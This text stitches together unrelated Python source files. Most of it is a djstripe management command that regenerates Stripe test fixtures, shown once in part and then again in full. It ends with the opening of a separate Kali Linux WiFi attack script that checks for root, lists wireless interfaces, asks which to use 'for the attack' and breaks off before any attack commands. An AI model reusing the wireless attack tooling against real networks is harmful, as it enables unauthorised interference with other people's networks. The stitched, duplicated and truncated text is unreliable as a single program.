for payment_method in djstripe.models.PaymentMethod.api_list( customer=customer.id, type="card" ): self.update_fake_id_map(payment_method) for subscription in customer["subscriptions"]["data"]: self.update_fake_id_map(subscription) def update_fake_id_map(self, obj): fake_id = self.get_fake_id(obj) actual_id = obj["id"] if fake_id: if fake_id in self.fake_id_map: assert self.fake_id_map[fake_id] == actual_id, ( f"Duplicate fake_id {fake_id} - reset your test Stripe data at " f"https://dashboard.stripe.com/account/data" ) self.fake_id_map[fake_id] = actual_id return fake_id else: return actual_id def get_fake_id(self, obj): """ Get a stable fake id from a real Stripe object, we use this so that fixtures are stable :param obj: :return: """ fake_id = None if isinstance(obj, str): real_id = obj real_id_map = {v: k for k, v in self.fake_id_map.items()} fake_id = real_id_map.get(real_id) elif "metadata" in obj: # Note: not all objects have a metadata dict # (eg Account, BalanceTransaction don't) fake_id = obj.get("metadata", {}).get(FAKE_ID_METADATA_KEY) elif obj.get("object") == "balance_transaction": # assume for purposes of fixture generation that 1 balance_transaction per # source charge (etc) fake_source_id = self.get_fake_id(obj["source"]) fake_id = "txn_fake_{}".format(fake_source_id) return fake_id def fake_json_ids(self, json_str): """ Replace real ids with fakes ones in the JSON fixture Do this on the serialized JSON string since it's a simple string replace :param json_str: :return: """ for fake_id, actual_id in self.fake_id_map.items(): json_str = json_str.replace(actual_id, fake_id) return json_str def unfake_json_ids(self, json_str): """ Replace fake ids with actual ones in the JSON fixture Do this on the serialized JSON string since it's a simple string replace :param json_str: :return: """ for fake_id, actual_id in self.fake_id_map.items(): json_str = json_str.replace(fake_id, actual_id) # special-case: undo the replace for the djstripe_test_fake_id in metadata json_str = json_str.replace( f'"{FAKE_ID_METADATA_KEY}": "{actual_id}"', f'"{FAKE_ID_METADATA_KEY}": "{fake_id}"', ) return json_str def update_fixture_obj( # noqa: C901 self, old_obj, model_class, readonly_fields, do_preserve_sideeffect_fields, object_sideeffect_fields, common_sideeffect_fields, ): """ Given a fixture object, update it via stripe :param model_class: :param old_obj: :param readonly_fields: :return: """ # restore real ids from Stripe old_obj = json.loads(self.unfake_json_ids(json.dumps(old_obj))) id_ = old_obj["id"] self.stdout.write(f"{model_class.__name__} {id_}", ending="") # For objects that we can't directly choose the ids of # (and that will thus vary between stripe accounts) # we fetch the id from a related object if issubclass(model_class, djstripe.models.Account): created, obj = self.get_or_create_stripe_account( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.BankAccount): created, obj = self.get_or_create_stripe_bank_account( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Card): created, obj = self.get_or_create_stripe_card( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Source): created, obj = self.get_or_create_stripe_source( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Invoice): created, obj = self.get_or_create_stripe_invoice( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.Charge): created, obj = self.get_or_create_stripe_charge( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.PaymentIntent): created, obj = self.get_or_create_stripe_payment_intent( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.PaymentMethod): created, obj = self.get_or_create_stripe_payment_method( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.BalanceTransaction): created, obj = self.get_or_create_stripe_balance_transaction( old_obj=old_obj ) else: try: # fetch from Stripe, using the active API version # this allows us regenerate the fixtures from Stripe # and hopefully, automatically get schema changes obj = model_class(id=id_).api_retrieve() created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) if issubclass(model_class, djstripe.models.Subscription): create_obj = self.pre_process_subscription(create_obj=create_obj) obj = model_class._api_create(**create_obj) created = True self.update_fake_id_map(obj) if do_preserve_sideeffect_fields: obj = self.preserve_old_sideeffect_values( old_obj=old_obj, new_obj=obj, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) return created, obj def get_or_create_stripe_account(self, old_obj, readonly_fields): obj = djstripe.models.Account().api_retrieve() return True, obj def get_or_create_stripe_bank_account(self, old_obj, readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) # see https://stripe.com/docs/connect/testing#account-numbers # we've stash the account number in the metadata # so we can regenerate the fixture create_obj["account_number"] = old_obj["metadata"][ "djstripe_test_fixture_account_number" ] create_obj["object"] = "bank_account" obj = customer.sources.create(source=create_obj) created = True return created, obj def get_or_create_stripe_card(self, old_obj, readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) obj = customer.sources.create(**{"source": "tok_visa"}) for k, v in create_obj.items(): setattr(obj, k, v) obj.save() created = True return created, obj def get_or_create_stripe_source(self, old_obj, readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) source_obj = djstripe.models.Source._api_create( **{"token": "tok_visa", "type": "card"} ) obj = customer.sources.create(**{"source": source_obj.id}) for k, v in create_obj.items(): setattr(obj, k, v) obj.save() created = True return created, obj def get_or_create_stripe_invoice(self, old_obj, writable_fields): subscription = djstripe.models.Subscription( id=old_obj["subscription"] ).api_retrieve() id_ = subscription["latest_invoice"] try: obj = djstripe.models.Invoice(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find invoice via subscription" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_charge(self, old_obj, writable_fields): invoice = djstripe.models.Invoice(id=old_obj["invoice"]).api_retrieve() id_ = invoice["charge"] try: obj = djstripe.models.Charge(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find charge via invoice" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_payment_intent(self, old_obj, writable_fields): invoice = djstripe.models.Invoice(id=old_obj["invoice"]).api_retrieve() id_ = invoice["payment_intent"] try: obj = djstripe.models.PaymentIntent(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find payment_intent via invoice" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_payment_method(self, old_obj, writable_fields): id_ = old_obj["id"] customer_id = old_obj["customer"] type_ = old_obj["type"] try: obj = djstripe.models.PaymentMethod(id=id_).api_retrieve() created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") obj = djstripe.models.PaymentMethod()._api_create( type=type_, card={"token": "tok_visa"} ) stripe.PaymentMethod.attach( obj["id"], customer=customer_id, api_key=djstripe.settings.STRIPE_SECRET_KEY, ) for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() created = True return created, obj def get_or_create_stripe_balance_transaction(self, old_obj): source = old_obj["source"] if source.startswith("ch_"): charge = djstripe.models.Charge(id=source).api_retrieve() id_ = djstripe.models.StripeModel._id_from_data( charge["balance_transaction"] ) try: obj = djstripe.models.BalanceTransaction(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find balance transaction via source" return created, obj def save_fixture(self, obj): type_name = obj["object"] id_ = self.update_fake_id_map(obj) fixture_path = tests.FIXTURE_DIR_PATH.joinpath(f"{type_name}_{id_}.json") with fixture_path.open("w") as f: json_str = self.fake_json_ids(json.dumps(obj, indent=4)) f.write(json_str) return fixture_path def pre_process_subscription(self, create_obj): # flatten plan/items on create items = create_obj.get("items", {}).get("data", []) if len(items): # don't try and create with both plan and item (list of plans) create_obj.pop("plan", None) create_obj.pop("quantity", None) # TODO - move this to SubscriptionItem handling? subscription_item_create_fields = { "plan", "billing_thresholds", "metadata", "quantity", "tax_rates", } create_items = [] for item in items: create_item = { k: v for k, v in item.items() if k in subscription_item_create_fields } create_item["plan"] = djstripe.models.StripeModel._id_from_data( create_item["plan"] ) create_items.append(create_item) create_obj["items"] = create_items else: # don't try and send empty items list create_obj.pop("items", None) create_obj["plan"] = djstripe.models.StripeModel._id_from_data( create_obj["plan"] ) return create_obj def preserve_old_sideeffect_values( self, old_obj, new_obj, object_sideeffect_fields, common_sideeffect_fields ): """ Try to preserve values of side-effect fields from old_obj, to reduce churn in fixtures """ object_name = new_obj.get("object") sideeffect_fields = object_sideeffect_fields.get(object_name, set()).union( set(common_sideeffect_fields) ) old_obj = old_obj or {} for f, old_val in old_obj.items(): try: new_val = new_obj[f] except KeyError: continue if isinstance(new_val, stripe.api_resources.ListObject): # recursively process nested lists for n, (old_val_item, new_val_item) in enumerate( zip(old_val.get("data", []), new_val.data) ): new_val.data[n] = self.preserve_old_sideeffect_values( old_obj=old_val_item, new_obj=new_val_item, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) elif isinstance(new_val, stripe.stripe_object.StripeObject): # recursively process nested objects new_obj[f] = self.preserve_old_sideeffect_values( old_obj=old_val, new_obj=new_val, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) elif ( f in sideeffect_fields and type(old_val) == type(new_val) and old_val != new_val ): # only preserve old values if the type is the same new_obj[f] = old_val return new_obj
import json from copy import deepcopy from typing import Dict, List, Set, Type import stripe.api_resources import stripe.stripe_object import tests from django.core.management import BaseCommand from stripe.error import InvalidRequestError import djstripe.models import djstripe.settings """ Key used to store fake ids in the real stripe object's metadata dict """ FAKE_ID_METADATA_KEY = "djstripe_test_fake_id" class Command(BaseCommand): """ This does the following: 1) Load existing fixtures from JSON files 2) Attempts to read the corresponding objects from Stripe 3) If found, for types Stripe doesn't allow us to choose ids for, we build a map between the fake ids in the fixtures and real Stripe ids 3) If not found, creates objects in Stripe from the fixtures 4) Save objects back as fixtures, using fake ids if available The rationale for this is so that the fixtures can automatically be updated with Stripe schema changes running this command. This should make keeping our tests and model schema compatible with Stripe schema changes less pain-staking and simplify the process of upgrading the targeted Stripe API version. """ help = "Command to update test fixtures using a real Stripe account." fake_data_map = {} # type: Dict[Type[djstripe.models.StripeModel], List] fake_id_map = {} # type: Dict[str, str] def add_arguments(self, parser): parser.add_argument( "--delete-stale", action="store_true", help="Delete any untouched fixtures in the directory", ) parser.add_argument( "--update-sideeffect-fields", action="store_true", help="Don't preserve sideeffect fields such as 'created'", ) def handle(self, *args, **options): do_delete_stale_fixtures = options["delete_stale"] do_preserve_sideeffect_fields = not options["update_sideeffect_fields"] common_readonly_fields = ["object", "created", "updated", "livemode"] common_sideeffect_fields = ["created"] # TODO - is it be possible to get a list of which fields are writable from # the API? maybe using https://github.com/stripe/openapi ? # (though that's only for current version) """ Fields that we treat as read-only. Most of these will cause an error if sent to the Stripe API. """ model_extra_readonly_fields = { djstripe.models.Account: ["id"], djstripe.models.Customer: [ "account_balance", "currency", "default_source", "delinquent", "invoice_prefix", "subscriptions", "sources", ], djstripe.models.BankAccount: [ "id", "bank_name", "customer", "last4", "fingerprint", "status", ], djstripe.models.Card: [ "id", "address_line1_check", "address_zip_check", "brand", "country", "customer", "cvc_check", "dynamic_last4", "exp_month", "exp_year", "fingerprint", "funding", "last4", "tokenization_method", ], djstripe.models.PaymentIntent: ["id"], djstripe.models.PaymentMethod: ["id"], djstripe.models.Source: [ "id", "amount", "card", "client_secret", "currency", "customer", "flow", "owner", "statement_descriptor", "status", "type", "usage", ], djstripe.models.Subscription: [ "id", # not actually read-only "billing_cycle_anchor", # seem that this is replacing "billing"? (but they can't both be set) "collection_method", "current_period_end", "current_period_start", "latest_invoice", "start", "start_date", "status", ], } # type: Dict[Type[djstripe.models.StripeModel], List[str]] """ Fields that we don't care about the value of, and that preserving allows us to avoid churn in the fixtures """ model_sideeffect_fields = { djstripe.models.BalanceTransaction: ["available_on"], djstripe.models.Source: ["client_secret"], djstripe.models.Charge: ["receipt_url"], djstripe.models.Subscription: [ "billing_cycle_anchor", "current_period_start", "current_period_end", "start", "start_date", ], djstripe.models.SubscriptionItem: [ # we don't currently track separate fixtures for SubscriptionItems "id" ], djstripe.models.Product: ["updated"], djstripe.models.Invoice: [ "date", "finalized_at", "hosted_invoice_url", "invoice_pdf", "webhooks_delivered_at", "period_start", "period_end", # we don't currently track separate fixtures for SubscriptionItems "subscription_item", ], } # type: Dict[Type[djstripe.models.StripeModel], List[str]] object_sideeffect_fields = { model.stripe_class.OBJECT_NAME: set(v) for model, v in model_sideeffect_fields.items() } # type: Dict[str, Set[str]] self.fake_data_map = { # djstripe.models.Account: [tests.FAKE_ACCOUNT], djstripe.models.Customer: [ tests.FAKE_CUSTOMER, tests.FAKE_CUSTOMER_II, tests.FAKE_CUSTOMER_III, tests.FAKE_CUSTOMER_IV, ], djstripe.models.BankAccount: [tests.FAKE_BANK_ACCOUNT_SOURCE], djstripe.models.Card: [ tests.FAKE_CARD, tests.FAKE_CARD_II, tests.FAKE_CARD_V, ], djstripe.models.Source: [tests.FAKE_SOURCE], djstripe.models.Product: [tests.FAKE_PRODUCT], djstripe.models.Plan: [tests.FAKE_PLAN, tests.FAKE_PLAN_II], djstripe.models.Subscription: [ tests.FAKE_SUBSCRIPTION, tests.FAKE_SUBSCRIPTION_II, tests.FAKE_SUBSCRIPTION_III, tests.FAKE_SUBSCRIPTION_MULTI_PLAN, ], djstripe.models.Invoice: [tests.FAKE_INVOICE], djstripe.models.Charge: [tests.FAKE_CHARGE], djstripe.models.PaymentIntent: [tests.FAKE_PAYMENT_INTENT_I], djstripe.models.PaymentMethod: [tests.FAKE_PAYMENT_METHOD_I], djstripe.models.BalanceTransaction: [tests.FAKE_BALANCE_TRANSACTION], } self.init_fake_id_map() objs = [] # Regenerate each of the fixture objects via Stripe # We re-fetch objects in a second pass if they were created during # the first pass, to ensure nested objects are up to date # (eg Customer.subscriptions), for n in range(2): any_created = False self.stdout.write(f"Updating fixture objects, pass {n}") # reset the objects list since we don't want to keep those from # the first pass objs.clear() for model_class, old_objs in self.fake_data_map.items(): readonly_fields = ( common_readonly_fields + model_extra_readonly_fields.get(model_class, []) ) for old_obj in old_objs: created, obj = self.update_fixture_obj( old_obj=deepcopy(old_obj), model_class=model_class, readonly_fields=readonly_fields, do_preserve_sideeffect_fields=do_preserve_sideeffect_fields, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) objs.append(obj) any_created = created or any_created if not any_created: # nothing created on this pass, no need to continue break else: self.stderr.write( "Warning, unexpected behaviour - some fixtures still being created " "in second pass?" ) # Now the fake_id_map should be complete and the objs should be up to date, # save all the fixtures paths = set() for obj in objs: path = self.save_fixture(obj) paths.add(path) if do_delete_stale_fixtures: for path in tests.FIXTURE_DIR_PATH.glob("*.json"): if path in paths: continue else: self.stdout.write("deleting {}".format(path)) path.unlink() def init_fake_id_map(self): """ Build a mapping between fake ids stored in Stripe metadata and those obj's actual ids We do this so we can have fixtures with stable ids for objects Stripe doesn't allow us to specify an id for (eg Card). Fixtures and tests will use the fake ids, when we talk to stripe we use the real ids :return: """ for fake_customer in self.fake_data_map[djstripe.models.Customer]: try: # can only access Cards via the customer customer = djstripe.models.Customer( id=fake_customer["id"] ).api_retrieve() except InvalidRequestError: self.stdout.write( f"Fake customer {fake_customer['id']} doesn't exist in Stripe yet" ) return # assume that test customers don't have more than 100 cards... for card in customer.sources.list(limit=100): self.update_fake_id_map(card) for payment_method in djstripe.models.PaymentMethod.api_list( customer=customer.id, type="card" ): self.update_fake_id_map(payment_method) for subscription in customer["subscriptions"]["data"]: self.update_fake_id_map(subscription) def update_fake_id_map(self, obj): fake_id = self.get_fake_id(obj) actual_id = obj["id"] if fake_id: if fake_id in self.fake_id_map: assert self.fake_id_map[fake_id] == actual_id, ( f"Duplicate fake_id {fake_id} - reset your test Stripe data at " f"https://dashboard.stripe.com/account/data" ) self.fake_id_map[fake_id] = actual_id return fake_id else: return actual_id def get_fake_id(self, obj): """ Get a stable fake id from a real Stripe object, we use this so that fixtures are stable :param obj: :return: """ fake_id = None if isinstance(obj, str): real_id = obj real_id_map = {v: k for k, v in self.fake_id_map.items()} fake_id = real_id_map.get(real_id) elif "metadata" in obj: # Note: not all objects have a metadata dict # (eg Account, BalanceTransaction don't) fake_id = obj.get("metadata", {}).get(FAKE_ID_METADATA_KEY) elif obj.get("object") == "balance_transaction": # assume for purposes of fixture generation that 1 balance_transaction per # source charge (etc) fake_source_id = self.get_fake_id(obj["source"]) fake_id = "txn_fake_{}".format(fake_source_id) return fake_id def fake_json_ids(self, json_str): """ Replace real ids with fakes ones in the JSON fixture Do this on the serialized JSON string since it's a simple string replace :param json_str: :return: """ for fake_id, actual_id in self.fake_id_map.items(): json_str = json_str.replace(actual_id, fake_id) return json_str def unfake_json_ids(self, json_str): """ Replace fake ids with actual ones in the JSON fixture Do this on the serialized JSON string since it's a simple string replace :param json_str: :return: """ for fake_id, actual_id in self.fake_id_map.items(): json_str = json_str.replace(fake_id, actual_id) # special-case: undo the replace for the djstripe_test_fake_id in metadata json_str = json_str.replace( f'"{FAKE_ID_METADATA_KEY}": "{actual_id}"', f'"{FAKE_ID_METADATA_KEY}": "{fake_id}"', ) return json_str def update_fixture_obj( # noqa: C901 self, old_obj, model_class, readonly_fields, do_preserve_sideeffect_fields, object_sideeffect_fields, common_sideeffect_fields, ): """ Given a fixture object, update it via stripe :param model_class: :param old_obj: :param readonly_fields: :return: """ # restore real ids from Stripe old_obj = json.loads(self.unfake_json_ids(json.dumps(old_obj))) id_ = old_obj["id"] self.stdout.write(f"{model_class.__name__} {id_}", ending="") # For objects that we can't directly choose the ids of # (and that will thus vary between stripe accounts) # we fetch the id from a related object if issubclass(model_class, djstripe.models.Account): created, obj = self.get_or_create_stripe_account( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.BankAccount): created, obj = self.get_or_create_stripe_bank_account( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Card): created, obj = self.get_or_create_stripe_card( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Source): created, obj = self.get_or_create_stripe_source( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Invoice): created, obj = self.get_or_create_stripe_invoice( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.Charge): created, obj = self.get_or_create_stripe_charge( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.PaymentIntent): created, obj = self.get_or_create_stripe_payment_intent( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.PaymentMethod): created, obj = self.get_or_create_stripe_payment_method( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.BalanceTransaction): created, obj = self.get_or_create_stripe_balance_transaction( old_obj=old_obj ) else: try: # fetch from Stripe, using the active API version # this allows us regenerate the fixtures from Stripe # and hopefully, automatically get schema changes obj = model_class(id=id_).api_retrieve() created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) if issubclass(model_class, djstripe.models.Subscription): create_obj = self.pre_process_subscription(create_obj=create_obj) obj = model_class._api_create(**create_obj) created = True self.update_fake_id_map(obj) if do_preserve_sideeffect_fields: obj = self.preserve_old_sideeffect_values( old_obj=old_obj, new_obj=obj, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) return created, obj def get_or_create_stripe_account(self, old_obj, readonly_fields): obj = djstripe.models.Account().api_retrieve() return True, obj def get_or_create_stripe_bank_account(self, old_obj, readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) # see https://stripe.com/docs/connect/testing#account-numbers # we've stash the account number in the metadata # so we can regenerate the fixture create_obj["account_number"] = old_obj["metadata"][ "djstripe_test_fixture_account_number" ] create_obj["object"] = "bank_account" obj = customer.sources.create(source=create_obj) created = True return created, obj def get_or_create_stripe_card(self, old_obj, readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) obj = customer.sources.create(**{"source": "tok_visa"}) for k, v in create_obj.items(): setattr(obj, k, v) obj.save() created = True return created, obj def get_or_create_stripe_source(self, old_obj, readonly_fields): customer = djstripe.models.Customer(id=old_obj["customer"]).api_retrieve() id_ = old_obj["id"] try: obj = customer.sources.retrieve(id_) created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") create_obj = deepcopy(old_obj) # create in Stripe for k in readonly_fields: create_obj.pop(k, None) source_obj = djstripe.models.Source._api_create( **{"token": "tok_visa", "type": "card"} ) obj = customer.sources.create(**{"source": source_obj.id}) for k, v in create_obj.items(): setattr(obj, k, v) obj.save() created = True return created, obj def get_or_create_stripe_invoice(self, old_obj, writable_fields): subscription = djstripe.models.Subscription( id=old_obj["subscription"] ).api_retrieve() id_ = subscription["latest_invoice"] try: obj = djstripe.models.Invoice(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find invoice via subscription" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_charge(self, old_obj, writable_fields): invoice = djstripe.models.Invoice(id=old_obj["invoice"]).api_retrieve() id_ = invoice["charge"] try: obj = djstripe.models.Charge(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find charge via invoice" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_payment_intent(self, old_obj, writable_fields): invoice = djstripe.models.Invoice(id=old_obj["invoice"]).api_retrieve() id_ = invoice["payment_intent"] try: obj = djstripe.models.PaymentIntent(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find payment_intent via invoice" for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() return created, obj def get_or_create_stripe_payment_method(self, old_obj, writable_fields): id_ = old_obj["id"] customer_id = old_obj["customer"] type_ = old_obj["type"] try: obj = djstripe.models.PaymentMethod(id=id_).api_retrieve() created = False self.stdout.write(" found") except InvalidRequestError: self.stdout.write(" creating") obj = djstripe.models.PaymentMethod()._api_create( type=type_, card={"token": "tok_visa"} ) stripe.PaymentMethod.attach( obj["id"], customer=customer_id, api_key=djstripe.settings.STRIPE_SECRET_KEY, ) for k in writable_fields: if isinstance(obj.get(k), dict): # merge dicts (eg metadata) obj[k].update(old_obj.get(k, {})) else: obj[k] = old_obj[k] obj.save() created = True return created, obj def get_or_create_stripe_balance_transaction(self, old_obj): source = old_obj["source"] if source.startswith("ch_"): charge = djstripe.models.Charge(id=source).api_retrieve() id_ = djstripe.models.StripeModel._id_from_data( charge["balance_transaction"] ) try: obj = djstripe.models.BalanceTransaction(id=id_).api_retrieve() created = False self.stdout.write(f" found {id_}") except InvalidRequestError: assert False, "Expected to find balance transaction via source" return created, obj def save_fixture(self, obj): type_name = obj["object"] id_ = self.update_fake_id_map(obj) fixture_path = tests.FIXTURE_DIR_PATH.joinpath(f"{type_name}_{id_}.json") with fixture_path.open("w") as f: json_str = self.fake_json_ids(json.dumps(obj, indent=4)) f.write(json_str) return fixture_path def pre_process_subscription(self, create_obj): # flatten plan/items on create items = create_obj.get("items", {}).get("data", []) if len(items): # don't try and create with both plan and item (list of plans) create_obj.pop("plan", None) create_obj.pop("quantity", None) # TODO - move this to SubscriptionItem handling? subscription_item_create_fields = { "plan", "billing_thresholds", "metadata", "quantity", "tax_rates", } create_items = [] for item in items: create_item = { k: v for k, v in item.items() if k in subscription_item_create_fields } create_item["plan"] = djstripe.models.StripeModel._id_from_data( create_item["plan"] ) create_items.append(create_item) create_obj["items"] = create_items else: # don't try and send empty items list create_obj.pop("items", None) create_obj["plan"] = djstripe.models.StripeModel._id_from_data( create_obj["plan"] ) return create_obj def preserve_old_sideeffect_values( self, old_obj, new_obj, object_sideeffect_fields, common_sideeffect_fields ): """ Try to preserve values of side-effect fields from old_obj, to reduce churn in fixtures """ object_name = new_obj.get("object") sideeffect_fields = object_sideeffect_fields.get(object_name, set()).union( set(common_sideeffect_fields) ) old_obj = old_obj or {} for f, old_val in old_obj.items(): try: new_val = new_obj[f] except KeyError: continue if isinstance(new_val, stripe.api_resources.ListObject): # recursively process nested lists for n, (old_val_item, new_val_item) in enumerate( zip(old_val.get("data", []), new_val.data) ): new_val.data[n] = self.preserve_old_sideeffect_values( old_obj=old_val_item, new_obj=new_val_item, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) elif isinstance(new_val, stripe.stripe_object.StripeObject): # recursively process nested objects new_obj[f] = self.preserve_old_sideeffect_values( old_obj=old_val, new_obj=new_val, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) elif ( f in sideeffect_fields and type(old_val) == type(new_val) and old_val != new_val ): # only preserve old values if the type is the same new_obj[f] = old_val return new_obj
# We will be using the subprocess module to run commands on Kali Linux. import subprocess # We require regular expressions. import re # We want to open the CSV files generated by airmon-ng, # and we'll use the built-in csv module. import csv # We want to import os because we want to check for sudo import os # We want to use time.sleep() import time # We want to move .csv files in the folder if we found any. # We'll use shutil for that. import shutil # Create a timestamp for .csv filename from datetime import datetime # Create an empty list active_wireless_networks = [] # We use this function to test if the ESSID is already in the list file. # If so we return False so we don't add it again. # If it is not in the lst we return True which will instruct the elif # statement to add it to the lst. def check_for_essid(essid, lst): check_status = True # If no ESSIDs in list add the row if len(lst) == 0: return check_status # This will only run if there are wireless access points in the list. for item in lst: # If True don't add to list. False will add it to list if essid in item["ESSID"]: check_status = False return check_status # Basic user interface header print(r"""______ _ _ ______ _ _ | _ \ (_) | | | ___ \ | | | | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""") print("\n****************************************************************") print("\n* Copyright of David Bombal, 2021 *") print("\n* https://www.davidbombal.com *") print("\n* https://www.youtube.com/davidbombal *") print("\n****************************************************************") # If the user doesn't run the program with super user privileges, don't allow them to continue. if not 'SUDO_UID' in os.environ.keys(): print("Try running this program with sudo.") exit() # Remove .csv files before running the script. for file_name in os.listdir(): # We should only have one csv file as we delete them from the folder # every time we run the program. if ".csv" in file_name: print("There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.") # We get the current working directory. directory = os.getcwd() try: # We make a new directory called /backup os.mkdir(directory + "/backup/") except: print("Backup folder exists.") # Create a timestamp timestamp = datetime.now() # We move any .csv files in the folder to the backup folder. shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name) # Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher. wlan_pattern = re.compile("^wlan[0-9]+") # Python allows is to run system commands by using a function provided by the subprocess module. # subprocess.run(<list of command line arguments goes here>) # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. # We run the iwconfig command to look for wireless interfaces. check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode()) # No WiFi Adapter connected. if len(check_wifi_result) == 0: print("Please connect a WiFi adapter and try again.") exit() # Menu to select WiFi interface from print("The following WiFi interfaces are available:") for index, item in enumerate(check_wifi_result): print(f"{index} - {item}") # Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from. while True: wifi_interface_choice = input("Please select the interface you want to use for the attack: ") try: if check_wifi_result[int(wifi_interface_choice)]: break except: print("Please enter a number that corresponds with the choices available.") # For easy reference we call the selected interface hacknic hacknic = check_wifi_result[int(wifi_interface_choice)] # Tell the user we're going to kill the conflicting processes. print("WiFi adapter connected!\nNow let's kill conflicting processes:") # subprocess.run(<list of 